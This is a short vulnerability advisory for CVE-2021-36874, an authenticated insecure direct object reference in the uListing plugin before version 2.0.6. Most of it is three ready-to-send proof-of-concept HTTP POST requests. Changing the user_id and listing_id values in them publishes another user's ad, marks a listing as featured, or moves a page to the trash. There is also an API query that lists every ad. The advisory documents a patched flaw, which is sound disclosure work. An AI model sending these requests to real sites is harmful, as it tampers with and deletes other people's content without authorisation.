uListing < 2.0.6 – Authenticated IDOR | CVE 2021-36874

Description

An Authenticated (User) IDOR vulnerability was discovered in the plugin.

Proof of Concept

Important: user_id and listing_id values are dependent on each other, that is, if the author ID == 4, the data can only be modified for those ADs and pages that relate to this particular ID. You can find out the author of the AD/page/post and his ID, f.e., from the source code of the AD page or via API.

Get all custom ADs via API: https://example.com/1/api/my-listing/list?status=all&user_id=-1&query_var[]=&listing_type=-1&pagination_settings[maxPagesToShow]=-1

PoC #1 | Authenticated IDOR | Publish AD:

POST /1/api/ulisting-user/draft_or_delete HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 74

{"user_id":262,"listing_id":"904","status":"publish",
"nonce":"23dfa4aa88"}


PoC #2 | Authenticated IDOR | Featured option:

POST /1/api/ulisting-listing/set-feature HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 74

{"listing_id":"904","plan_id":true}


PoC #3 | Authenticated IDOR | Delete page:

POST /1/api/ulisting-user/draft_or_delete HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 71

{"user_id":0,"listing_id":"2","status":"trash",
"nonce":"23dfa4aa88"}